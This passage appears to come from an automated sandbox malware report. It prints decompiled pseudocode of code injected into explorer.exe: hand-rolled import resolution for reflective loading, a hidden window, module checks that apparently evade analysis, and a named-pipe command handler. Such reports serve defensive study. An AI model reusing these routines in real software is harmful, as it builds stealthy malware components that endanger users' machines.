                            				_t29->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t29);
                            				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                            				_t17 = E0008E3B6(_t3);
                            				_t7 = _t29 + 0x220; // 0xb0220
                            				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                            				_t18 = E0008E3F1(_t7); // executed
                            				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                            				return _t18;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                            • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                            • memset.MSVCRT ref: 0008CFE2
                            • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                            • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E0009249B(signed int __eax, intOrPtr _a4) {
                            				intOrPtr* _v8;
                            				signed int* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				struct HINSTANCE__* _v48;
                            				intOrPtr _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				signed int _v64;
                            				signed int _t109;
                            				signed int _t112;
                            				signed int _t115;
                            				struct HINSTANCE__* _t121;
                            				void* _t163;
                            
                            				_v44 = _v44 & 0x00000000;
                            				if(_a4 != 0) {
                            					_v48 = GetModuleHandleA("kernel32.dll");
                            					_v40 = E0008E099(_v48, "GetProcAddress");
                            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            					_v32 = _v52;
                            					_t109 = 8;
                            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                            						L24:
                            						return 0;
                            					}
                            					_v56 = 0x80000000;
                            					_t112 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_v8 = _v8 + 0x14;
                            					}
                            					_t115 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                            						_v36 = _t121;
                            						if(_v36 != 0) {
                            							if( *_v8 == 0) {
                            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                            							} else {
                            								_v12 =  *_v8 + _a4;
                            							}
                            							_v28 = _v28 & 0x00000000;
                            							while( *_v12 != 0) {
                            								_v24 = _v24 & 0x00000000;
                            								_v16 = _v16 & 0x00000000;
                            								_v64 = _v64 & 0x00000000;
                            								_v20 = _v20 & 0x00000000;
                            								if(( *_v12 & _v56) == 0) {
                            									_v60 =  *_v12 + _a4;
                            									_v20 = _v60 + 2;
                            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                            									_v16 = _v40(_v36, _v20);
                            								} else {
                            									_v24 =  *_v12;
                            									_v20 = _v24 & 0x0000ffff;
                            									_v16 = _v40(_v36, _v20);
                            								}
                            								if(_v24 != _v16) {
                            									_v44 = _v44 + 1;
                            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                            										 *_v12 = _v16;
                            									} else {
                            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                            									}
                            								}
                            								_v12 =  &(_v12[1]);
                            								_v28 = _v28 + 4;
                            							}
                            							_v8 = _v8 + 0x14;
                            							continue;
                            						}
                            						_t163 = 0xfffffffd;
                            						return _t163;
                            					}
                            					goto L24;
                            				}
                            				return __eax | 0xffffffff;
                            			}
























                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                            • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 164 82eda-82f50 memset call 8902d 169 82fcd-82fd4 164->169 170 82f52-82f81 CreateWindowExA 164->170 171 82fdf-82ff4 169->171 173 82fd6-82fd7 169->173 170->171 172 82f83-82f92 ShowWindow 170->172 175 82f9b 172->175 173->171 176 82fba-82fcb 175->176 176->169 178 82f9d-82fa0 176->178 178->169 179 82fa2-82fb2 178->179 179->176
                            C-Code - Quality: 96%
                            			E00082EDA(void* __eflags) {
                            				CHAR* _v12;
                            				struct HINSTANCE__* _v32;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				void _v52;
                            				char _v80;
                            				char _v144;
                            				intOrPtr _t25;
                            				intOrPtr _t32;
                            				struct HWND__* _t34;
                            				intOrPtr _t36;
                            				intOrPtr _t39;
                            				struct HWND__* _t44;
                            				intOrPtr _t47;
                            				intOrPtr _t50;
                            				void* _t51;
                            				intOrPtr _t53;
                            				intOrPtr _t56;
                            				intOrPtr _t59;
                            				struct HINSTANCE__* _t64;
                            
                            				_t25 =  *0x9e684; // 0xc2f8f0
                            				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                            				memset( &_v52, 0, 0x30);
                            				_t59 =  *0x9e688; // 0xb0000
                            				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                            				_v48 = 3;
                            				_v52 = 0x30;
                            				_v12 =  &_v144;
                            				_v44 = E00082E77;
                            				_push( &_v52);
                            				_t32 =  *0x9e694; // 0xc2fa48
                            				_v32 = _t64;
                            				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                            					L6:
                            					_t34 =  *0x9e718; // 0x30094
                            					if(_t34 != 0) {
                            						_t39 =  *0x9e694; // 0xc2fa48
                            						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                            					}
                            					L8:
                            					_t36 =  *0x9e694; // 0xc2fa48
                            					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                            					return 0;
                            				}
                            				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                            				 *0x9e718 = _t44;
                            				if(_t44 == 0) {
                            					goto L8;
                            				}
                            				ShowWindow(_t44, 0);
                            				_t47 =  *0x9e694; // 0xc2fa48
                            				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
                            				while(1) {
                            					_t50 =  *0x9e694; // 0xc2fa48
                            					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                            					if(_t51 == 0) {
                            						goto L6;
                            					}
                            					if(_t51 == 0xffffffff) {
                            						goto L6;
                            					}
                            					_t53 =  *0x9e694; // 0xc2fa48
                            					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                            					_t56 =  *0x9e694; // 0xc2fa48
                            					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                            				}
                            				goto L6;
                            			}
























                            APIs
                            • memset.MSVCRT ref: 00082EF9
                            • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                            • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateShowmemset
                            • String ID: 0
                            • API String ID: 3027179219-4108050209
                            • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                            • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 181 84d6d-84d8f 182 84dee-84e1b call 8b7a8 call 8a86d call 8a471 181->182 183 84d91-84db3 call 895c7 * 2 181->183 196 84e1d-84e20 182->196 197 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 182->197 183->182 193 84db5-84db7 183->193 193->182 195 84db9-84dc4 GetModuleHandleA 193->195 198 84dcd 195->198 199 84dc6-84dcb GetModuleHandleA 195->199 200 852b9-852bf 196->200 216 84ea1-84ed9 call 8861a call 84a0b 197->216 217 84e82-84e93 call 8896f 197->217 202 84dd5-84dec call 885c2 * 2 198->202 199->198 199->202 202->182 202->196 227 84ef8-84f1b 216->227 228 84edb-84ee3 216->228 223 84e9c-84e9f 217->223 224 84e95-84e97 call 8a2e3 217->224 223->216 224->223 230 84f1d-84f2b 227->230 231 84f2f-84f4d call 8e2c6 227->231 228->227 229 84ee5-84ee9 228->229 232 84eef-84ef2 229->232 233 851f3-85220 call 895e1 call 892e5 229->233 230->231 239 84f52-84f54 231->239 232->227 232->233 244 85222-8522b call 8b269 233->244 245 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 233->245 241 84f71-84f78 239->241 242 84f56-84f6a call 8e2c6 239->242 241->233 243 84f7e-84f87 241->243 242->241 247 84f89-84f8e 243->247 248 84f96-84fa3 243->248 256 85239-85246 call 8861a 244->256 257 8522d-85232 244->257 278 852b7 245->278 247->248 253 84f90 247->253 248->233 254 84fa9-84fad 248->254 253->248 258 85082-85088 254->258 259 84fb3-84fb6 254->259 256->245 257->256 258->233 264 8508e-850ff call 849a5 call 8fc1f 258->264 259->233 262 84fbc-8500f call 849a5 call 88604 259->262 262->278 281 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 262->281 264->233 282 85105-85119 call 88604 264->282 278->200 281->278 282->233 288 8511f-85171 call 8109a call 8902d call 860df 282->288 302 85173-851e2 call 89640 call 885d5 call 8a911 call 8861a 288->302 303 851e5-851f2 call 8861a 288->303 302->303 303->233
                            C-Code - Quality: 70%
                            			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                            				char _v516;
                            				char _v556;
                            				char _v564;
                            				char _v568;
                            				char _v572;
                            				char _v576;
                            				intOrPtr _v580;
                            				char _v588;
                            				signed int _v596;
                            				intOrPtr _v602;
                            				intOrPtr _v604;
                            				char _v608;
                            				CHAR* _v612;
                            				CHAR* _v616;
                            				signed int _v620;
                            				signed int _v624;
                            				signed int _v628;
                            				signed int _v632;
                            				char _v636;
                            				intOrPtr _t119;
                            				void* _t120;
                            				signed int _t122;
                            				intOrPtr _t123;
                            				CHAR* _t124;
                            				intOrPtr _t125;
                            				CHAR* _t127;
                            				WCHAR* _t130;
                            				intOrPtr _t133;
                            				intOrPtr _t137;
                            				WCHAR* _t138;
                            				intOrPtr _t142;
                            				WCHAR* _t143;
                            				CHAR* _t144;
                            				intOrPtr _t145;
                            				intOrPtr _t150;
                            				intOrPtr _t153;
                            				WCHAR* _t154;
                            				signed int _t159;
                            				WCHAR* _t160;
                            				intOrPtr _t163;
                            				intOrPtr _t165;
                            				intOrPtr _t166;
                            				intOrPtr _t170;
                            				signed int _t173;
                            				signed int _t178;
                            				intOrPtr _t182;
                            				WCHAR* _t184;
                            				char _t186;
                            				WCHAR* _t188;
                            				intOrPtr _t200;
                            				intOrPtr _t211;
                            				signed int _t215;
                            				char _t220;
                            				WCHAR* _t231;
                            				intOrPtr _t235;
                            				intOrPtr _t238;
                            				intOrPtr _t239;
                            				intOrPtr _t246;
                            				signed int _t248;
                            				WCHAR* _t249;
                            				CHAR* _t250;
                            				intOrPtr _t262;
                            				void* _t271;
                            				intOrPtr _t272;
                            				signed int _t277;
                            				void* _t278;
                            				intOrPtr _t280;
                            				signed int _t282;
                            				void* _t298;
                            				void* _t299;
                            				intOrPtr _t305;
                            				CHAR* _t326;
                            				void* _t328;
                            				WCHAR* _t329;
                            				intOrPtr _t331;
                            				WCHAR* _t333;
                            				signed int _t335;
                            				intOrPtr* _t337;
                            				void* _t338;
                            				void* _t339;
                            				void* _t353;
                            
                            				_t353 = __fp0;
                            				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                            				_t119 =  *0x9e688; // 0xb0000
                            				_v620 = _v620 & 0x00000000;
                            				_t328 = __ecx;
                            				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                            					L7:
                            					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
                            					_t14 = _t120 + 1; // 0x1
                            					E0008A86D( &_v556, _t14, _t351);
                            					_t298 = 0x64;
                            					_t122 = E0008A471( &_v556, _t298);
                            					 *0x9e748 = _t122;
                            					if(_t122 != 0) {
                            						_push(0x4e5);
                            						_t299 = 0x10;
                            						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
                            						 *0x9e680 = _t123;
                            						 *_t337 = 0x610;
                            						_t124 = E000895E1(0x9b9cc);
                            						_push(0);
                            						_push(_t124);
                            						_v612 = _t124;
                            						_t125 =  *0x9e688; // 0xb0000
                            						_t127 = E000892E5(_t125 + 0x228);
                            						_t338 = _t337 + 0xc;
                            						_v616 = _t127;
                            						E000885D5( &_v612);
                            						_t130 = E0008B269(_t127);
                            						_t246 = 3;
                            						__eflags = _t130;
                            						if(_t130 != 0) {
                            							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                            							 *_t328 = _t246;
                            						}
                            						E0008861A( &_v616, 0xfffffffe);
                            						_t133 =  *0x9e688; // 0xb0000
                            						_t22 = _t133 + 0x114; // 0xb0114
                            						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                            						_t262 =  *0x9e688; // 0xb0000
                            						_t339 = _t338 + 0x14;
                            						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                            						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                            							L17:
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							_v572 = _t328;
                            							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                            							_t137 =  *0x9e680; // 0xc2fda0
                            							_t138 =  *(_t137 + 8);
                            							__eflags = _t138;
                            							if(_t138 != 0) {
                            								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                            							}
                            							_v620 = _v620 & 0x00000000;
                            							E0008E2C6(_t353,  &_v576); // executed
                            							_pop(_t262);
                            							_t142 =  *0x9e6b4; // 0xc2fa98
                            							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                            							__eflags = _t143;
                            							if(_t143 == 0) {
                            								E0008E2C6(_t353,  &_v588);
                            								_t235 =  *0x9e6b4; // 0xc2fa98
                            								_pop(_t262);
                            								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                            							}
                            							__eflags =  *0x9e73c;
                            							if( *0x9e73c <= 0) {
                            								goto L36;
                            							} else {
                            								_t165 =  *0x9e680; // 0xc2fda0
                            								__eflags =  *(_t165 + 8);
                            								if( *(_t165 + 8) != 0) {
                            									_t231 =  *(_t165 + 0xc);
                            									__eflags = _t231;
                            									if(_t231 != 0) {
                            										 *_t231(_v580);
                            									}
                            								}
                            								_t166 =  *0x9e688; // 0xb0000
                            								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                            								__eflags = _t262 - _t246;
                            								if(_t262 == _t246) {
                            									goto L36;
                            								} else {
                            									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                            									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                            										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                            										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                            											E000849A5();
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											_t170 =  *0x9e684; // 0xc2f8f0
                            											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                            											_t262 = _v602;
                            											_t248 = 0x3c;
                            											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                            											_v596 = _t173;
                            											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                            											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                            											_v624 = _t178;
                            											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                            											_t182 =  *0x9e688; // 0xb0000
                            											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                            											_t339 = _t339 + 0xc;
                            											__eflags = _t184;
                            											if(_t184 >= 0) {
                            												_t333 = E00088604(0x1000);
                            												_v616 = _t333;
                            												_pop(_t262);
                            												__eflags = _t333;
                            												if(_t333 != 0) {
                            													_t186 = E0008109A(_t262, 0x148);
                            													_t305 =  *0x9e688; // 0xb0000
                            													_v636 = _t186;
                            													_push(_t305 + 0x648);
                            													_push(0xa);
                            													_push(7);
                            													_t271 = 2;
                            													E0008902D(_t271,  &_v572);
                            													_t272 =  *0x9e688; // 0xb0000
                            													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                            													_t339 = _t339 + 0x18;
                            													_v632 = _t188;
                            													__eflags = _t188;
                            													if(_t188 != 0) {
                            														_push(_v624 % _t248 & 0x0000ffff);
                            														_push(_v628 & 0x0000ffff);
                            														_push(_v596 % _t248 & 0x0000ffff);
                            														_push(_v620 & 0x0000ffff);
                            														_push(_v632);
                            														_push( &_v572);
                            														_t200 =  *0x9e688; // 0xb0000
                            														__eflags = _t200 + 0x1020;
                            														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                            														E000885D5( &_v636);
                            														E0008A911(_t333, 0, 0xbb8, 1);
                            														E0008861A( &_v632, 0xfffffffe);
                            														_t339 = _t339 + 0x44;
                            													}
                            													E0008861A( &_v616, 0xfffffffe);
                            													_pop(_t262);
                            												}
                            											}
                            										}
                            										goto L36;
                            									}
                            									__eflags = _t262 - 2;
                            									if(_t262 != 2) {
                            										goto L36;
                            									}
                            									E000849A5();
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									_t211 =  *0x9e684; // 0xc2f8f0
                            									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                            									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                            									_v628 = _t215;
                            									_t277 = 0x3c;
                            									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                            									_t249 = E00088604(0x1000);
                            									_v624 = _t249;
                            									_pop(_t278);
                            									__eflags = _t249;
                            									if(_t249 != 0) {
                            										_t220 = E000895E1(_t278, 0x32d);
                            										_t280 =  *0x9e688; // 0xb0000
                            										_push(_t280 + 0x228);
                            										_t282 = 0x3c;
                            										_v636 = _t220;
                            										_push(_v628 % _t282 & 0x0000ffff);
                            										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                            										E000885D5( &_v636);
                            										E0008A911(_t249, 0, 0xbb8, 1);
                            										E0008861A( &_v624, 0xfffffffe);
                            									}
                            									goto L41;
                            								}
                            							}
                            						} else {
                            							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                            							__eflags = _t238 - _t246;
                            							if(_t238 == _t246) {
                            								goto L17;
                            							}
                            							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                            							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                            								L36:
                            								_t144 = E000895E1(_t262, 0x610);
                            								_push(0);
                            								_push(_t144);
                            								_v616 = _t144;
                            								_t145 =  *0x9e688; // 0xb0000
                            								_t329 = E000892E5(_t145 + 0x228);
                            								_v612 = _t329;
                            								__eflags = _t329;
                            								if(_t329 != 0) {
                            									_t160 = E0008B269(_t329);
                            									__eflags = _t160;
                            									if(_t160 != 0) {
                            										_t163 =  *0x9e684; // 0xc2f8f0
                            										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                            									}
                            									E0008861A( &_v612, 0xfffffffe);
                            								}
                            								E000885D5( &_v616);
                            								_t150 =  *0x9e688; // 0xb0000
                            								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                            								_t153 =  *0x9e688; // 0xb0000
                            								_t154 = _t153 + 0x228;
                            								__eflags = _t154;
                            								lstrcpynW(_t154,  *0x9e738, 0x105);
                            								_t331 =  *0x9e688; // 0xb0000
                            								_t117 = _t331 + 0x228; // 0xb0228
                            								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                            								E0008861A(0x9e740, 0xfffffffe);
                            								E0008861A(0x9e738, 0xfffffffe);
                            								L41:
                            								_t159 = 0;
                            								__eflags = 0;
                            								L42:
                            								return _t159;
                            							}
                            							__eflags = _t238 - 2;
                            							if(_t238 != 2) {
                            								goto L36;
                            							}
                            							goto L17;
                            						}
                            					}
                            					L8:
                            					_t159 = _t122 | 0xffffffff;
                            					goto L42;
                            				}
                            				_t250 = E000895C7(0x6e2);
                            				_v616 = _t250;
                            				_t326 = E000895C7(0x9f5);
                            				_v612 = _t326;
                            				if(_t250 != 0 && _t326 != 0) {
                            					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                            						_v620 = 1;
                            					}
                            					E000885C2( &_v616);
                            					_t122 = E000885C2( &_v612);
                            					_t351 = _v620;
                            					if(_v620 != 0) {
                            						goto L8;
                            					}
                            				}
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                            • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                            • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
                            • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                            • Opcode Fuzzy Hash: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
                            • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 314 832a1-832b4 315 832b7-832ce ConnectNamedPipe 314->315 316 832d0-832db GetLastError 315->316 317 832e1-83304 315->317 316->317 318 834c2-834c8 316->318 320 834a8 GetLastError 317->320 321 8330a-8330e 317->321 322 834ae-834bc DisconnectNamedPipe 320->322 321->320 323 83314-83320 321->323 322->315 322->318 324 833b8-833d1 call 893be 323->324 325 83326-83329 323->325 334 83476-8349b call 896ca 324->334 335 833d7-833dd 324->335 327 8332b-8332f 325->327 328 83397-833b3 call 8c319 325->328 331 8337b-83384 call 8f79f 327->331 332 83331-83334 327->332 328->322 352 83358-8335b 331->352 337 83365-83369 call 8f79f 332->337 338 83336-83339 332->338 354 8349d-834a6 call 8c319 334->354 342 833df-833f6 call 88604 335->342 343 83454-8346f call 89749 call 81da0 335->343 350 8336e-83376 337->350 339 8333b-8333e 338->339 340 8334f-83353 call 8f7c1 338->340 339->322 346 83344-8334d call 8f7c1 339->346 340->352 362 833f8-833fd 342->362 363 83471 342->363 343->334 346->350 350->354 355 8335d-83363 352->355 356 83386-83388 352->356 354->322 361 8338a-83392 call 8c319 355->361 356->361 361->322 368 8342a-83452 call 89749 call 81da0 call 894b7 362->368 369 833ff-83402 362->369 366 83473 363->366 366->334 368->366 373 83404-83425 call 8c379 call 891a6 369->373 382 83427 373->382 382->368
                            C-Code - Quality: 54%
                            			E000832A1() {
                            				char _v8;
                            				struct _OVERLAPPED* _v12;
                            				struct _OVERLAPPED* _v16;
                            				intOrPtr* _v20;
                            				char _v24;
                            				intOrPtr _v32;
                            				signed int _v36;
                            				intOrPtr* _v40;
                            				char _v168;
                            				char _v172;
                            				intOrPtr _t41;
                            				void* _t47;
                            				char _t54;
                            				char _t61;
                            				intOrPtr _t64;
                            				void* _t65;
                            				void* _t68;
                            				void* _t70;
                            				void* _t72;
                            				void* _t76;
                            				struct _OVERLAPPED* _t82;
                            				intOrPtr* _t83;
                            				signed int _t84;
                            				signed short* _t86;
                            				intOrPtr* _t97;
                            				signed short* _t105;
                            				void* _t107;
                            				void* _t108;
                            				void* _t109;
                            				intOrPtr* _t112;
                            				struct _OVERLAPPED* _t113;
                            				char _t114;
                            				void* _t115;
                            
                            				_t113 = 0;
                            				_t82 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				while(1) {
                            					_v16 = _t113;
                            					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
                            						break;
                            					}
                            					_push(_t113);
                            					_push( &_v16);
                            					_t41 =  *0x9e684; // 0xc2f8f0
                            					_push(0x80000);
                            					_push( *0x9e724);
                            					_push( *0x9e674);
                            					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                            						GetLastError();
                            					} else {
                            						_t86 =  *0x9e724; // 0x1920020
                            						_t47 = ( *_t86 & 0x0000ffff) - 1;
                            						if(_t47 == 0) {
                            							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
                            							_v40 = _t112;
                            							if(_t112 != 0) {
                            								_t114 = _v24;
                            								if(_t114 <= 1) {
                            									_t113 = 0;
                            									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
                            									_t115 = _t115 + 0x10;
                            									_v172 = _t54;
                            								} else {
                            									_v36 = _t114 - 1;
                            									_t83 = E00088604(_t114 - 1 << 2);
                            									_v32 = _t83;
                            									if(_t83 == 0) {
                            										_t113 = 0;
                            									} else {
                            										if(_t114 > 1) {
                            											_v20 = _t83;
                            											_t84 = 1;
                            											do {
                            												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
                            												_t97 = _v20;
                            												_t84 = _t84 + 1;
                            												 *_t97 = _t64;
                            												_v20 = _t97 + 4;
                            											} while (_t84 < _t114);
                            											_t83 = _v32;
                            										}
                            										_t113 = 0;
                            										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
                            										_t115 = _t115 + 0x10;
                            										_v172 = _t61;
                            										E000894B7( &_v24);
                            									}
                            									_t82 = _v12;
                            								}
                            							}
                            							_t105 =  *0x9e724; // 0x1920020
                            							E000896CA( &_v168,  &(_t105[4]), 0x80);
                            							_push(0x84);
                            							_push( &_v172);
                            							_push(2);
                            							goto L33;
                            						} else {
                            							_t65 = _t47 - 3;
                            							if(_t65 == 0) {
                            								_push(_t113);
                            								_push(_t113);
                            								_t108 = 5;
                            								E0008C319(_t108);
                            								 *0x9e758 = 1;
                            								_t82 = 1;
                            								_v12 = 1;
                            							} else {
                            								_t68 = _t65;
                            								if(_t68 == 0) {
                            									_t70 = E0008F79F( &_v8);
                            									goto L13;
                            								} else {
                            									_t72 = _t68 - 1;
                            									if(_t72 == 0) {
                            										E0008F79F( &_v8);
                            										goto L16;
                            									} else {
                            										_t76 = _t72 - 1;
                            										if(_t76 == 0) {
                            											_t70 = E0008F7C1( &_v8);
                            											L13:
                            											if(_t70 == 0) {
                            												_push(_t113);
                            												_push(_t113);
                            												_push(0xa);
                            											} else {
                            												_push(_v8);
                            												_push(_t70);
                            												_push(5);
                            											}
                            											_pop(_t109);
                            											E0008C319(_t109);
                            										} else {
                            											if(_t76 == 1) {
                            												E0008F7C1( &_v8);
                            												L16:
                            												_push(4);
                            												_push( &_v8);
                            												_push(5);
                            												L33:
                            												_pop(_t107);
                            												E0008C319(_t107);
                            												_t115 = _t115 + 0xc;
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            					DisconnectNamedPipe( *0x9e674);
                            					if(_t82 == 0) {
                            						continue;
                            					}
                            					break;
                            				}
                            				return 0;
                            			}

                            APIs
                            • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                            • GetLastError.KERNEL32 ref: 000832D0
